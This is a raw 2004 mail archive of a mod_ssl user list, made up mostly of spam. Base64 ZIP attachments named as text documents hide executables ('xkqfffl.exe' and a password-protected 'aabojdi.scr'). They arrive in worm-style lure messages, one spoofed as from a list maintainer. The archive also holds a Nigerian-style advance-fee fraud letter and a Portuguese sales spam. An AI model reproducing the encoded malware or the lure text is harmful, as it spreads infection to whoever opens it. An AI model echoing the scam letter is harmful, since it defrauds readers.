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
BQYAAAAAAQABADkAAACTWAAAAAA=

----------jcjwsyqbleydhsuegqxu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From benjackdon@2by2.net  Sun Mar 14 13:01:11 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from smtp.2by2.net (smtp.2by2.net [208.254.51.136])
	by master.modssl.org (Postfix) with SMTP id 68F83A8972
	for ; Sun, 14 Mar 2004 13:00:54 +0100 (CET)
Received: from  daniela [208.254.51.180] by BUBBA.smtp.2by2.net with SMTP (2.0.1.32291) Sun, 14 Mar 2004 04:00:51 -0800
Received: from [80.179.251.98] by DANIELA.2by2.net via HTTP; Sun, 14 Mar 2004 04:00:51 -0800
From: 
To: benjackdon@2by2.net
Subject: URGENT AND CONFIDETIAL
Date: Sun, 14 Mar 2004 04:00:51 -0800
MIME-Version: 1.0
Importance: Normal
Message-Id: <20040314120054.68F83A8972@master.modssl.org>



Tel: 874-763648313
   : 874-763648314
Fax: 874-763648315

Attn:
URGENT AND CONFIDETIAL
My name is Ben Jackdon, I am the operational manager in account
management section incharge of credit and foreign bills of one of the prime
banks here in South Africa. I am writing in respect of a foreign customer
of my bank who perished with his whole families on 25TH JULY,2000 in
CONCORDE PLANE CRASH [Flight AF4590] with the whole passengers aboard.

There is an account opened in this bank in 1998 by this great late
INDUSTRIALIST who died without a written or oral 'WILL' attached to the
account. Since his death, I personally has watched with keen interest to see
   the next of kin but all has proved abortive as no one has come to
claim  his funds and no other person knows about this account or anything
concerning it, the account has no other beneficiary and until his death
he  was the manager of his company.

The total amount involved is 106,000,000.00 USD.[One Hundred and Six
Million United States Dollar]. We wish to start the first transfer with
$6,000,000.00[Six million] and upon successful transaction without any
disappointment from your side, we shall re-apply for the transfer of the
remaining balance to your account.

I have secretly discussed this matter with the general manager of the
bank who I must involve in order to have a smooth and a successful
transfer of the fund to any foreign bank account which you are going to
nominate. On this note, I decided to seek for a reliable foreigner who will
act as the foreign beneficiary of the fund from the deceased by providing
his/her bank account where the fund will be transferred for immediate
investment on any viable project as no one has come up to be the next of
kin.

The banking ethics here does not allow such money to stay more than six
   years without claim hence the money will be recalled to the
government  treasury as unclaimed after this long period of domancy. 

In view of this I got your contact through my personal search to see if
   you can assist by providing your safe bank account for the transfer
or  find a reliable person who will be capable of receiving such amount
in his or her personal account. At the conclussion of the transfer 65% of
 the fund will be for me, I will give you 20% of the total transfer sum,
 10% for charity both in Africa and in your country while the remaining
5%  will be set aside to settle expenses both parties might incure
during the transfer process.

Upon the receipt of your reply, I will send to you a detailed
information about the transaction. I will not fail to bring to your notice that
this business is 100% risk and trouble free and that you should not
entertain any fear as all modalities for fund transfer can be finalized
within 7 to 9 banking days, after you apply to the bank as the beneficiary of
   the fund from the deceased.

When you receive this letter. Kindly send me an e-mail in this my
private account:(benjackdon4@netscape.net)or you can call me or fax me. You
should also include your private fax and phone numbers  for easy and safe
  communication. 

Tel: 874-763648313
   : 874-763648314
Fax: 874-763648315

Respectfully yours,
Ben Jackdon.






From eroca101010@bol.com.br  Sun Mar 14 21:50:09 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from smtp.uol.com.br (smtpout6.uol.com.br [200.221.11.59])
	by master.modssl.org (Postfix) with ESMTP id 98428A8938
	for ; Sun, 14 Mar 2004 21:49:50 +0100 (CET)
Received: from localhost (BA084127.user.veloxzone.com.br [200.217.84.127])
	by scorpion6.uol.com.br (Postfix) with ESMTP id EF6AA82B1
	for ; Sun, 14 Mar 2004 17:49:42 -0300 (BRT)
X-Sender: eroca101010@bol.com.br
From: Marisa Ribeiro 
To: modssl-users-l@master.modssl.org
Date: Sun, 14 Mar 2004 17:22:17 -0300
Subject: Modelos de cartas comerciais: http://www.gueb.de/modelosdecartascomerciais
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-Id: <20040314204942.EF6AA82B1@scorpion6.uol.com.br>

As cartas comerciais, têm grande importância na administração de qualquer
empreendimento, pois uma parte significativa das transações mundiais se
realiza por esse meio.  A carta é o instrumento que faz a conexão entre os
negociantes. 

http://www.gueb.de/modelosdecartascomerciais

Estamos lançando o CD MODELOS DE CARTAS COMERCIAIS, que sana suas dúvidas na 
elaboração de todos os tipos de cartas e
documentos empresariais: agradecimentos, atestados e declarações, avisos, 
cartas de cobrança, cartas em inglês, comunicados,  convites,  contratos,
propostas, empregos, solicitações e pedidos, telegramas, cartas por e-mail,
etc.

http://www.gueb.de/modelosdecartascomerciais

O CD contém mais de 400 modelos de Cartas Comerciais e inúmeras técnicas de
Redação Comercial. 

Indicado para: secretárias em geral, gerências, Rh, executivos, estudantes,
empresas de toda ordem, etc.

O custo é ínfimo em relação ao que poderá gerar no aperfeiçoamento da
comunicação de sua empresa.

http://www.gueb.de/modelosdecartascomerciais


From owner-modssl-users@modssl.org  Sun Mar 14 22:46:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 53753A8995; Sun, 14 Mar 2004 22:46:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VALUED-28A9447F (eva-wlan-14.AirBears.Berkeley.EDU [169.229.253.29])
	by master.modssl.org (Postfix) with SMTP id 30298A895E
	for ; Sun, 14 Mar 2004 22:46:02 +0100 (CET)
Date: Sun, 14 Mar 2004 13:56:56 -0500
To: modssl-users@modssl.org
Subject: Hi! :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------upwsyjxrhjkmhjtbxxjx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------upwsyjxrhjkmhjtbxxjx
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i don't like the plaintext :)

password:  47777

----------upwsyjxrhjkmhjtbxxjx
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

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
